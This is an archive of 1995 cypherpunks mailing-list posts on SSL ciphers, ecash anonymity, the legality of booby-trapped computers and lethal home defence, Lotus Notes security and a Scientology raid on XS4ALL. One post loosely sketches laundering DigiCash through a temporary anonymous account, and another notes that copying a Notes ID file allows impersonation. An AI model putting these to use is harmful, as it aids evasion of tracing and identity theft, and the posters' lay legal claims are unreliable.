In article <9509051506.AA09665@wombat.sware.com>, jeffb@sware.com (Jeff Barber) writes:
> Adam Shostack writes:
> 
> > | Netscape sells a 128-bit US-only client for $39
> 
> > 	Does the US only server also do des, 3des and IDEA, or just
> > rc4-128?
> 
> Yes.  It does:
> 
>     RC4 - 128
>     RC4 - 40
>     RC2 - 128
>     RC2 - 40
>     IDEA
>     DES, "64 bits"
>     DES "with EDE 3, 192 bits"

  Our software does not implement idea at this time.  It is in the SSL
spec, as a possible cypher choice.  We do implement the rest, including
DES and 3DES.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 20:38:15 PDT
To: cypherpunks@toad.com
Subject: Are booby-trapped computers legal?
Message-ID: <ac7263200d0210049f0b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(I've changed the name of this thread.)

At 2:30 AM 9/6/95, Lucky Green wrote:

>I am wondering about the legalities of booby trapped computer equipment.
>Would it be legal if a clear warning to the fact was posted on the
>hardware?

There are two types of "booby traps" to consider:

* Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if and
when a burglar enters. Or an electrified region of a room is set to "get
energized" when an intruder enters. These are "surprises" and are canonical
booby traps.

These have been found to be illegal in several court cases. (I'm not a
lawyer, but I've been reading about them for 20 years. Famous cases where a
burglar sued, and won, because he was injured when breaking into a house.)

* Type 2 Booby Trap: electrified perimeter fences. So long as these are
adequately marked ("If you touch this fence, you will probably die"), and
are not public nuisances where children and pets will inadvertently
validate Darwin's theory, these are--I think--legal. There may be license
fees required, to build an electrified fence, but I think it is possible to
build a lethal voltage electrified fence on one's property.

Thus, I suspect it is fully legal to build an electrified fence around
one's PC, providing suitable warnings are included.

I would not call the second type a real booby trap, though some courts
might, depending. A properly labelled electrified fence seems legal, on
one's own property, but may not be. And certainly I think any
explosive-rigged system is illegal, for explosives reasons if not for booby
trap reasons.

I know of no case law on this, and suspect that if an FBI agent were to be
electrocuted or blown up upon trying to open/use/disconnect the PC, even
with clear warnings, that a prosecution would happen. Results are unclear
(to me).

(I think that if an FBI agent were to be electrocuted while climbing on a
clearly labelled electrified fence, no prosecution would result.)

Of course, if a PC were to be clearly labelled as being rigged, then steps
could presumably be taken to defuse the arrangement.

>Interesting side note: a few months ago, several hundred 5 gallon
>containers of insecticide were stolen from the lot of an agricultural
>supply dealer here in California.  The incident made a small note in the SF
>Chronicle. It was mentioned that the FBI is taking part in the
>investigation.
>
>What wasn't mentioned was that this insecticide is an ideal precursor to
>various forms of neuro toxins, namely Tabun and Soman, two types of nerve
>gas so vicious and toxic that even Hitler refused to approve their use. I
>predict that eventful times are just around the corner.

As Lucky knows, I live out in the country. I agree that some "muckers"
(R.I.P. John Brunner) are likely to mount assaults on urban centers.

Bad news for some. But then the good news is that the threat of nuclear
annihilation has all but gone away completely, and that cancels out an
awful lot of the minor bad news items the scribblers keep telling us are so
awful.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 20:47:45 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <v02120d0bac72d46f9337@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:32 9/5/95, Bryce Wilcox wrote:

>I hope I'm not missing anything here.

Only that Ecash has no benefits for transactions that are of an illegal
nature. The meaning of "illegal" is of course increasing as new laws are
passed every session of the legislature.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 20:48:03 PDT
To: cypherpunks@toad.com
Subject: Growth of actions definded as crime. Which math formula?
Message-ID: <v02120d0cac72d4f2b20d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


With every session of Congress, previously legal acts become illegal. Has
anyone worked out a function of this growth (number of crimes in the books
vs. time)? I am not looking at the numbers of laws passed, but at
individual acts that are defined to be illegal. If this has been studied,
what is the formula? If anyone with access to more appropriate lists could
please give me a pointer/forward the post there, I'd be grateful.

TIA,

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 5 Sep 95 21:33:34 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <199509060432.VAA05003@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: shamrock@netcom.com (Lucky Green)
> So it is harder to compile dosiers on people. Big deal. The recipient can
> still determine who gets the goods paied for by the "anonymous" ecash by
> conventional means (hint: shipping address), so the payee anonymity is of
> little value as far as protecting the privacy of the payer (most likely
> the recipient of the goods) is concerened.

This would be true for physical goods in any payment system, no matter
how anonymous, unless physical remailers are used (and they have their
limitations).  However software (including music, video, etc.) would be
easier to deliver anonymously.  It is generally agreed that more of our
economy is moving towards information exchanges and so ecash-like
systems can play an increasingly larger part in protecting privacy.  To
me, this is indeed a big deal.

Even for physical goods, the use of ecash is better than credit cards
because the information about purchases is distributed rather than
centralized.  Every time I look at my credit card bill I feel dismayed
at what the company is finding out about my family.

Ecash could also be used as a cash replacement in smartcards.  Consider
as an alternative a fully traceable payment system, where you use your
debit card at the supermarket, the bus station, the snack bar, the drug
store.  I suspect that if we don't get something like ecash then this
system will be the alternative.  It opens up possibilities for
dossiers that will fulfill Big Brother's dreams.  Virtually every move
of every citizen will be recorded in just a few centralized places.
IMO the protection of payor privacy that even Chaum's limited ecash
provides is very important.

> Ecash of course is of *no* value for the various assasination markets,
> drug dealing, money laundring, etc that routinely get mentioned in the
> same paragraph as Ecash. The reason is the *full traceability* of the
> payee that has been deliberately built into the current version of Ecash.
> A "feature" that you may rest assured will be part of all future versions
> backed by anyone with even marginal reputation in the financial markets.

Well, I have never fully accepted the notion that crypto was going to
usher in an age of anarchy.  As long as we deal with physical goods in
the physical world it seems to me that anonymity will be difficult.  On
the net it is easier but man does not live by bits alone.

For me, protecting privacy is a difficult enough problem.  Transforming
the world into a libertarian/anarchist utopia is somebody else's job.

Hal

P.S. Without seeing the technical specs it is hard to describe in detail,
but generally Chaumian ecash allows fully anonymous coerced transfers.
The payee/coercer supplies the blinded coins and forces the payor to use
them to make withdrawals from his account.  The resulting signed
tokens are passed to the coercer who unblinds them and now has fully
anonymous, untraceable cash tokens which he can spend.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 5 Sep 95 14:06:19 PDT
To: cypherpunks@toad.com
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509050417.VAA05211@jobe.shell.portal.com>
Message-ID: <199509051940.VAA26244@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Hal (hfinney@shell.portal.com) wrote:

>I understand that Netscape's browser will also accept certificates
>created by a Netscape-internal "test" CA.  I hoped that perhaps some
>junk certificates from that CA might be floating around, ones which
>would be useless for conventional purposes because their secret keys
>are exposed, but which would be perfect for my needs.

Is it possible that since this was only a "test" CA, that netscape used
less than a full-strength key?  If it was only 512 bits or so, we could
try cracking it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 21:31:51 PDT
To: cypherpunks@toad.com
Subject: Re: Are booby-trapped computers legal?
Message-ID: <ac7271110e021004e592@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:19 AM 9/6/95, Jim Choate wrote:

>> Thus, I suspect it is fully legal to build an electrified fence around
>> one's PC, providing suitable warnings are included.
>>
>
>As far as I know the owner of property has no legal right to kill a person
>either traspassing or stealing it in any of the 50 states. There was a
>recent federal ruling that basicly says that if you meet a burglar in your
>home at nite you can not kill or otherwise harm them unless you're life is
>directly threatened. In short, you MUST give up the ground if at all
>possible. Federal and all 50 states (as far as I have been able to
>determine) rule human life to have a inherantly higher value than property
>of any type (this does not apply to government institutions).

Well, I wasn't saying one had a legal right to kill a person either
trespassing or stealing, I was saying that electrified fences carrying
lethal voltages are extant. How they got that way, and what licenses are
involved, is unknown to me. But they do exist.

>In Texas and all other cattle states that I am aware of, there are specific
>laws that limit how much voltage and current capacity an electrified fence
>can have. These laws specificaly prohibit any form of lethal installation.
>There is no license required nor do you have to mark the fences as electrified.

Cattle fences are not what I was talking about. I have an electrified fence
on one side of my property, to keep the deer away. Lethal voltage fences,
to keep humans out, are another matter.


....

>I don't know what you call it but if nothing else it is ethicaly and moraly
>reprehinsible.

Different strokes for different folks. Anyone entering my house unannounced
faces lethal response. I think of it as evolution in action, and doubt I
would lose any sleep over this.

It has nothing to do with equating human life over property, it has to do
with defending one's property and (maybe) one's life. Here in California,
it is becoming more and more common for "home invasions" to be followed by
execution of all of the witnesses. (Read "The San Jose Mercury News" for
accounts of gang invasions in which all the residents in a home are lined
up and shot, excecution-style.)

I won't get into a discussion of which states permit lethal force
responses, as this is a topic which even I think belongs in
talk.politics.guns or similar fora.

Suffice it to say that most states allow lethal response under threatening
circumstances.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:55:45 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <199509060153.VAA14379@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509052310.QAA10027@jobe.shell.portal.com>,
hfinney@shell.portal.com (Hal) wrote:

>This is not completely correct; there is a degree of anonymity in
>DigiCash's ecash.  That is anonymity of how a person spends his money.
>Neither the bank nor the payor is in a position to learn who or where a
>particular piece of ecash comes from (assuming that anonymous
>communication means are used).

So it is harder to compile dosiers on people. Big deal. The recipient can
still determine who gets the goods paied for by the "anonymous" ecash by
conventional means (hint: shipping address), so the payee anonymity is of
little value as far as protecting the privacy of the payer (most likely
the recipient of the goods) is concerened.

Ecash of course is of *no* value for the various assasination markets,
drug dealing, money laundring, etc that routinely get mentioned in the
same paragraph as Ecash. The reason is the *full traceability* of the
payee that has been deliberately built into the current version of Ecash.
A "feature" that you may rest assured will be part of all future versions
backed by anyone with even marginal reputation in the financial markets.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMEz/CyoZzwIn1bdtAQErdwGA3TrIYF5+O1EOQ+qdCyZRo8ePJnxmAAAl
EeES8xBtWDBFwqUXTFRbj1hqLv9kwQ6K
=7w8Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tweetpunk@aol.com
Date: Tue, 5 Sep 95 19:14:05 PDT
To: cypherpunks@toad.com
Subject: Key Certification by US Post Office
Message-ID: <950905221353_11856933@mail02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Copious apologies if this is old news, but I just got a chance to read some
mags from the last few weeks:

An article in *The Economist* (August 5th-11th 1995 p56) reports that the
United States Postal Service has plans to offer *electronic certificates of
identity encoded to prevent forgery*
It goes on to say that they are working with the usual suspects (Microsoft
and Lotus/IBM) to get appropriate software included in their products. 

Future services include timestamping, multimedia kiosks in post office
lobbies and e-mail print out and delivery services (for the connectivity
challenged).

I guess this puts a new twist on saying that PGP is an envelope for your
e-mail.

-------
Greg Anders
tweetpunk@aol.com

To have loved and lost liked Patsy Cline, it is better to have never loved at
all.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Sep 95 22:34:46 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <199509060419.XAA04296@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950905220511.3325B-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 5 Sep 1995, Jim Choate wrote:

> . . . federal ruling that basicly says that if you meet a burglar in your
> home at nite you can not kill or otherwise harm them unless you're life is
> directly threatened. In short, you MUST give up the ground if at all
> possible. . . . 

Citation please.  Killing is usually a state matter.  I doubt
there was any such federal ruling.

In California, there is a legal presumption that anyone who
illegally enters an occupied dwelling, at night, is a threat
to life or great bodily harm.  You may, therefore, use deadly
force without further evidence.  (This means you can shoot 'em
in the back if you want.)

Now back to the booby-trapped computer thread:

I think it would be better to have your booby-trap kill your 
data, not the nice men in the nomex ski masks.  While those folks
might take a dim view of the former, they would most certainly
would take extreme umbridge at the latter.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 5 Sep 95 19:33:24 PDT
To: jsimmons@goblin.punk.net
Subject: Re: NSA says Joe Sixpack won't buy crypto
Message-ID: <80607.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  Black Unicorn <unicorn@access.digex.net>  writes:
> On Tue, 5 Sep 1995, Jeff Simmons wrote:
>>   So what form of GAK or trap-doorodoes lotus notes contain?
> No, it's just been so weak before the current implementation of RC4 (and
> note the export version still has 40 bits) that it might as well be
> nothing.

Uni is right. Notes used RSA, which starts out fine. but it has
nothing  like PGP's passphrase to protect the private key. You can
simply copy the "username.ID" file, and you can sign and encrypt
messages with "username"'s nym.

Of course, Corporate america loves Notes, which is why IBM bought it.

Weak encryption for weak minds.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Calabro <kensington@earthlink.net>
Date: Wed, 6 Sep 95 18:31:17 PDT
Subject: Symbols on the net :)
Message-ID: <42ijlr$rff@mars.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


If you know of any symbols or acronyms used on the net, please mail them   
to me. 
 
Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 5 Sep 95 21:42:46 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <v02120d0bac72d46f9337@[192.0.2.1]>
Message-ID: <199509060442.WAA08575@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I, Bryce Wilcox <bryce.wilcox@colorado.edu> wrote:
> 
> >I hope I'm not missing anything here.


shamrock@netcom.com (Lucky Green) wrote:
>
> Only that Ecash has no benefits for transactions that are of an illegal
> nature. The meaning of "illegal" is of course increasing as new laws are
> passed every session of the legislature.


Chaum says that (especially when speaking before U.S. Congress) but I think
he is playing both sides of the fence.  He is a die-hard privacy advocate who
allegedly turns down lucrative business deals because he feels they would
dilute his privacy achievements.  The truth is that Chaumian DigiCash is a
*lot* safer for criminals than, say, credit cards, and when it is combined
with the other tools in a money launderer's toolbox, I expect it will be a
great boon to them.


Suppose you have acquired a million dollars worth of legal, above-board
DigiCash dollars and you want to surreptitiously transfer this wealth to a
below-board friend.  Your friend creates a temporary anonymous account at an
understanding bank.  You just use a lot of small denominations to squirt the
dollars to your friend's account.  Then he squirts them to his real accounts
and destroys the blinding factors that the temporary anon account used.


Now without active physical surveillance, nobody other than yourself and your
friend will ever know where the money went, and you can't prove that you gave
it to him, either...


I hope no bloodthirsty mob bosses or statist legislators are reading this...


Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBME0mG/WZSllhfG25AQES6AP9H6wluOOoUKpN92hiVSrwrig4dKoRbPJt
d7ROsrQUyx5OXBZXRxyrQvY3z/Qd4ytHXpoKAfpizGwAClqFubZ/OcRxTyiAudgG
0mA+dd9nHYPswAyVFmLk9rqkv3AIO3Ikq8uunh4KkUx72rmZf62G8+N4nkR7TKZP
/E+1PDmuPzI=
=wvSK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 22:57:13 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <v02120d0fac72f40a1ca9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:56 9/5/95, Black Unicorn wrote:
rypted mail preferred.
>
>Really it's hard to answer this because what constitutes a "NEW" act is a
>real question in and of itself.
>
>For example, wire fraud.  Is it a "NEW" crime?  Or just a subset of
>fraud, or mail fraud?

If they guy would have gotten away before the new law was passed, it is a
new crime.

That's the stats I am looking for.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 22:57:11 PDT
To: cypherpunks@toad.com
Subject: Non-Delivery Notification
Message-ID: <v02120d10ac72f49d3f4d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


What is this shit? Got about ten today.

--- begin forwarded text

From: sysop@dkmail.dkeep.com
To: shamrock@netcom.com
Subject: Non-Delivery Notification
Organization: Dragon Keep (904) 375-3500
Date: Wed, 06 Sep 95 00:05:41 EST


     NON-DELIVERY NOTICE
     -------------------

The message you sent on:

Unknown to -unknown was undeliverable.

========================= !!! Automated Notice !!! =======================
 E-mail replies to this user should have the following on the first line
 of message text:        TO: -unknown
==========================================================================

--- end forwarded text


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 22:57:17 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <v02120d11ac72f4de4e9a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:42 9/5/95, Bryce Wilcox wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I, Bryce Wilcox <bryce.wilcox@colorado.edu> wrote:
>>
>> >I hope I'm not missing anything here.
>
>
>shamrock@netcom.com (Lucky Green) wrote:
>>
>> Only that Ecash has no benefits for transactions that are of an illegal
>> nature. The meaning of "illegal" is of course increasing as new laws are
>> passed every session of the legislature.
>
>
>Chaum says that (especially when speaking before U.S. Congress) but I think
>he is playing both sides of the fence.  He is a die-hard privacy advocate who
>allegedly turns down lucrative business deals because he feels they would
>dilute his privacy achievements.  The truth is that Chaumian DigiCash is a
>*lot* safer for criminals than, say, credit cards, and when it is combined
>with the other tools in a money launderer's toolbox, I expect it will be a
>great boon to them.

Chaum is a privacy advocate when it comes to companies compiling dosiers on
you. When it comes to criminal use, my conversations with Chaum, his public
comments, and last not least the current implementation of his software
suggest otherwise.

>
>Suppose you have acquired a million dollars worth of legal, above-board
>DigiCash dollars and you want to surreptitiously transfer this wealth to a
>below-board friend.  Your friend creates a temporary anonymous account at an
>understanding bank.  Y

Won't work. Ecash, except as used for frequent flyer like points, will
exist in only *one* world wide e$ currency, issued by a single entity
composed of various major banks and subject to US laws. Getting Ecash
accounts will therefore be subject to the same legal requirenments that
apply to normal US checking accounts.

>Now without active physical surveillance, nobody other than yourself and your
>friend will ever know where the money went, and you can't prove that you gave
>it to him, either...

You or a sting operation can always reveal the recipient by publishing the
blinding factor. Besides, your Ecash client keeps a log of the payees.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Tue, 5 Sep 95 22:59:41 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: Crypto '95
In-Reply-To: <199509021859.OAA02093@bwh.harvard.edu>
Message-ID: <9509060553.AA08998@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> 	The best talks were probably by Ross Anderson (Robustness
> Principles for Public Key Protocols) and Adi Shamir (Myths and
> Realities of Cryptography).

One interesting aspect of Anderson's result is that it decisively
breaks X.509 (he shows how to forge signatures in
encrypt-before-signing protocols by computing a discrete log over the
RSA modulus).  I strongly recommend the paper.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Tue, 5 Sep 95 21:12:02 PDT
To: mail2news@utopia.hacktic.nl
Subject: Re: SUMMARY: Not-so-volatile volatile memory
Message-ID: <m0sqBq5-00063yC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 AM 9/5/95 +0200, Anonymous wrote:
>
>Is this a new discovery?  When I used to work with DOD classified
>data, not so long ago, disk drives had to be declassified using an
>approved program, such as Norton Utilities' "WIPEINFO".  (That was
>approved up through the SECRET/SAR level, anyway.  I don't know
>about TS/SCI/SI.)  But those same regulations said that RAM was
>considered declassified within a certain time (30 seconds, I think)
>after power was removed.  (That time figure was UNclassified, BTW.)
>I think it was just to allow time for the voltage to bleed off of
>the power supply's filter capacitors, and not related to the
>relative volatility of DRAM.
  
I worked at a DoD contractor for a while, and there was a DoD-approved 
method of disposing of hard drives, which was expensive, laborious,
and rather silly.
 
We just had two witnesses watch as we smashed it to smithereens 
(technical term) with a sledge hammer, and then handed the parts over
to an approved disposal person (trash man).
 
It's JUST that easy.
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michaelb@primenet.com (Michael Bredimus)
Date: Tue, 5 Sep 95 23:01:57 PDT
To: cypherpunks@toad.com
Subject: Re: Are booby-trapped computers legal?
Message-ID: <199509060601.XAA08779@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:43 PM 9/5/95 -0700, Timothy C. May wrote:
<snip>
>>As far as I know the owner of property has no legal right to kill a person
>>either traspassing or stealing it in any of the 50 states. There was a
>>recent federal ruling that basicly says that if you meet a burglar in your
>>home at nite you can not kill or otherwise harm them unless you're life is
>>directly threatened. In short, you MUST give up the ground if at all
>>possible. Federal and all 50 states (as far as I have been able to
>>determine) rule human life to have a inherantly higher value than property
>>of any type (this does not apply to government institutions).
>
<snip>

The laws regarding the use of deadly force against an unarmed burglar in
one's home vary from state to state.  In Massachusetts, for example, a
homeowner has a DUTY to retreat from his own home before employing deadly
force against an intruder.

In Arizona, however, we prefer a much different approach.

13-411.  Justification; use of force in crime prevention

A.  A person is justified in threatening or using both physical force and
deadly physical force against another if an to the extent the person
reasonably believes that physical force or deadly physical force is
immediately necessary to prevent the other's commission of ... burglary in
the second or first degree under section 13-1507 ...


13-1507.  Burglary in the second degree; classification

A.  A person commits burglary in the second degree by entering or remaining
unlawfully in or on a residential structure with the intent to commit any
theft or any felony therein.



michaelb@primenet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: announce <announce@xs4all.nl>
Date: Tue, 5 Sep 95 14:10:25 PDT
To: cypherpunks@toad.com
Subject: Scientology and police visit XS4ALL Amsterdam
Message-ID: <199509052109.AA16923@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text



From: XS4ALL Internet
      Postbus 22864
      1100 DJ  Amsterdam
      tel: +31 20 6222885
      fax: +31 20 6222753


        PRESS RELEASE
        -------------


    Police and members of Scientology church enter offices of XS4ALL
    ================================================================

Amsterdam - thuesday september 5, 1995.

Today at about 14:00, XS4ALL was visited by Mr. S. Braan,
bailiff. He was acting on behalf of the Religious
Technology Centre, better known as the Scientology Church, or
Scientology for short. He was assisted by a local police officer and Mr.
Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology
in The Netherlands. Also present were two computer experts (Mr. Ootjes
and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and
two American employees of Scientology, Mr. Weightman and Ms. Jenssen.

Scientology is filing for seizure of XS4ALL's computer equipment. Under
dutch law, this means that a bailiff comes in to record your assets. In
real-life, the computer-experts that were present have recorded the
types and serial numbers of all the computers in our offices. They did
not take any equipment, the continuity of XS4ALL's services is not in
jeopardy.


What is this all about?
-----------------------

The Scientology Church claims that the XS4ALL anonymous remailer was used
to disseminate documents over the Internet to which the church holds the
legal copyright. This has led the church to ask the president of the
district court of Amsterdam to grant permission for this seizure as a
prelude to legal procedures concerning damages suffered by the church.
The remailer in question has been disabled more than 2 months ago.

During the visit of Scientology to XS4ALL this afternoon, the remailer
was not the subject of any conversation. The organisation seemed totally
preoccupied with the information about Scientology that one of our users
has put on his home page. Part of this information is said to be a file
to which Scientology holds the copyright. If we were to delete the file
in question on the spot, they were willing to drop the seizure.


Responsability of Internet Providers
------------------------------------

XS4ALL categorically denies any responsability for contents of users'
homepages. The users decide for themselves what is on their homepage.
Since XS4ALL does not edit the homepages and has no mechanism of
control over the contents we strongly feel that the users themselves are
responsible for what they say on their homepage.

This whole affair demonstrates the need for clarity concerning the legal
postion of Internet Providers. We are shocked that our offices can be
invaded bij freshly flown-in U.S. cult members. If we as Internet
providers are held responsible for what our users say, that will
undoubtebly kill freedom of speech on the net.


Scare-tactics
-------------

XS4ALL is not alone in receiving this kind of attention from
Scientology. Scientology, a semi-religious multinational, is at war with
a number of people on the Internet. A non-organized group of people on
the net has started to openly discuss the activities of the church.
Until recently, the church has always managed to supress critical voices
by means of sheer intimidation and by engaging in endless legal battle.

One of the people that Scientology has a problem with is 'fonss', an
XS4ALL user that publishes the F.A.C.T.-net Kit on his home page
(http://www.xs4all.nl/~fonss). This kit (which can be found on numerous
homepages all over the Internet) consists of a large number of documents
that show the true face of Scientology.

One of these documents is a piece to which Scientology supposedly holds
the copyright and which has been added to the kit without the church's
permission.



Additional information can be found on the Internet:

http://www.cybercom.net/~rnewman/scientology/home.html
http://www.xs4all.nl/~fonss
news:alt.religion.scientology
news:alt.censorship
news:alt.clearing.technology




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 23:15:31 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <v02120d13ac72fb4a20f8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:00 9/6/95, Black Unicorn wrote:

>> If they guy would have gotten away before the new law was passed, it is a
>> new crime.
>
>This is very rare.  It's mostly in definitional cases, for example, where
>Extacy was just not defined as a controlled substance some years ago.
>
>Created crimes are few and far between.

Excurse my ignorance, but it just begs the question. Why then all the new
laws? Just to twist the penalty screw another turn?

Confused,


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 5 Sep 95 21:14:42 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <ac7263200d0210049f0b@[205.199.118.202]>
Message-ID: <199509060419.XAA04296@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> 
> There are two types of "booby traps" to consider:
> 
> * Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if and
> when a burglar enters. Or an electrified region of a room is set to "get
> energized" when an intruder enters. These are "surprises" and are canonical
> booby traps.
> 
> These have been found to be illegal in several court cases. (I'm not a
> lawyer, but I've been reading about them for 20 years. Famous cases where a
> burglar sued, and won, because he was injured when breaking into a house.)
> 

These are completely illegal in Texas and Florida for shure. To make such
devices legal the state legal system has to equate property value to parity
with life. See below for further comment on this.

> * Type 2 Booby Trap: electrified perimeter fences. So long as these are
> adequately marked ("If you touch this fence, you will probably die"), and
